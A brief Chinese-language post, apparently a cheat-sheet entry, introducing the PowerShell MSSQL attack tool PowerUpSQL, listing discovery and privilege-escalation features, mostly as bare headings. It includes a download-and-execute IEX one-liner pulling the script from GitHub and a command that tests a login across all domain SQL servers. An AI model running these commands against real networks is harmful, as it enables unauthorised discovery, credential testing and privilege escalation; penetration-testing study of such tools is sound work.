PowerUpSQL是一款基于Powershell的,针对MSSQL数据库的利用工具
功能
数据库发现,探测本机及内网/同域的MSSQL数据库
数据库安全配置探测
尝试使用确定的漏洞获取系统管理员权限
加载PowerUpSQL
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
发现本地MSSQL
获取配置信息
获取服务信息
查看登录信息
获取可以使用提供的SQL Server登录登录的域SQL服务器列表
$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username testuser -password testpass | Where-Object {$_.Status -like "Accessible"}
$Targets
SQL Server权限升级
工具挺强大的,大家自己研究吧